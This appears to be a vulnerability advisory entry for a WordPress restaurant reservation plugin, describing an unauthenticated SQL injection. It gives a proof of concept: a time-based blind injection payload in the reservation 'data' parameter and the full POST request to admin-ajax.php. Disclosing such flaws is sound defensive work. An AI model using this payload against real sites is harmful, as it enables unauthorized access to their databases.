The plugin does not validate and escape some reservation parameters before using them in SQL statements, which could allow unauthenticated attackers to perform SQL Injection attacks
As unauthenticated, fill the reservation form (it's on a page where the [reservation_form] is embed), intercept the request and change the data parameter to something like ["5","11","11:11","13:11:00","2022-08-07","Name","Mail","2","phone","confirmed' AND (SELECT 7872 FROM (SELECT(SLEEP(5)))dkvk) AND 'X'='X"] POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 305 Connection: close action=kechup_rr_bookings_interact&validation_key=680bed9c59&operation=create&data=%5b%225%22%2c%2211%22%2c%2211%3a11%22%2c%2213%3a11%3a00%22%2c%222022-08-07%22%2c%22Name%22%2c%22Mail%22%2c%222%22%2c%22phone%22%2c%22confirmed'%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(0)))dkvk)%20AND%20'X'%3d'X%22%5d
Bastijn Ouwendijk
Bastijn Ouwendijk
Yes
2022-09-06 (about 8 months ago)
2022-09-06 (about 8 months ago)
2022-09-06 (about 8 months ago)